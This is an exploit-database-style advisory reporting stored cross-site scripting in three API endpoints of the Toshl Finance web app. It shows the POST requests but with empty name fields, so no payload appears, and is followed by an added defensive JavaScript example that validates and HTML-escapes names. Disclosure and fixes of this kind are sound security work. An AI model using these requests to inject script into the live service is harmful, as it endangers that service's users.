# Exploit Title: Toshl Finance Web Application - Multiple Areas of Stored Cross-Site Scripting (XSS)
# Date: 6/24/16
# Exploit Author: Brett DeWall
# Exploit Author Twitter: @xbadbiddyx
# Exploit Author Blog: http://xbadbiddyx.tumblr.com
# Vendor Homepage: https://toshl.com/app/
# Version: Latest commit
# Contacted Vendor Date: 6/18/16
### Vulnerable Area #1
Request
POST /api/tags?immediate_update=true HTTP/1.1
Host: toshl.com
{"type":"expense","name":"","category":"51076972"}
### Vulnerable Area #2
Request
POST /api/categories HTTP/1.1
Host: toshl.com
{"type":"income","name":""}
### Vulnerable Area #3
Request
POST /api/accounts HTTP/1.1
Host: toshl.com
{"name":"","currency":{"code":"USD","rate":1,"fixed":false},"initial_balance":1000}
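Added defensive example, not part of the original advisory: all three endpoints above accept a user-controlled `name` that is later shown in the web UI, and the stored XSS is removed by encoding that value at render time (the validator is a complementary length/charset policy, not the fix). Function names, the length limit and the sample body are assumptions.

```javascript
// Added example (not from the advisory): defensive handling of the `name`
// field accepted by /api/tags, /api/categories and /api/accounts.
// Stored XSS arises when a user-controlled name is stored verbatim and later
// inserted into the page as HTML. Two independent controls are shown:
//   1. validateName(): reject names that are empty, too long, or contain
//      control characters (a length/charset policy, not an HTML filter).
//   2. escapeHtml(): encode the stored value at render time, so a name that
//      contains markup is displayed as literal text.

const MAX_NAME_LENGTH = 64; // assumed limit; the real app's limit is unknown

function validateName(name) {
  if (typeof name !== "string") return { ok: false, reason: "not a string" };
  const trimmed = name.trim();
  if (trimmed.length === 0) return { ok: false, reason: "empty" };
  if (trimmed.length > MAX_NAME_LENGTH) return { ok: false, reason: "too long" };
  // Reject ASCII control characters (including CR/LF) that have no place in a label.
  if (/[\u0000-\u001F\u007F]/.test(trimmed)) return { ok: false, reason: "control character" };
  return { ok: true, value: trimmed };
}

// Encoding suitable for HTML element content and double-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Render a stored name into list markup: the value only ever passes through
// escapeHtml(), it is never concatenated into the HTML raw.
function renderNameItem(storedName) {
  const safe = escapeHtml(storedName);
  return `<li class="tag" title="${safe}">${safe}</li>`;
}

// Simulated create handler for the three endpoints: the JSON body's `name`
// is validated before it is stored. Returns the stored record or an error.
function handleCreate(endpoint, body) {
  const check = validateName(body.name);
  if (!check.ok) return { status: 400, error: `invalid name: ${check.reason}` };
  return { status: 201, endpoint, record: { ...body, name: check.value } };
}

// Constructed sample body: a tag name carrying markup and quote characters.
const sample = { type: "expense", name: 'Coffee & <b>snacks</b> "daily"', category: "51076972" };
const created = handleCreate("/api/tags", sample);
console.log(renderNameItem(created.record.name));
```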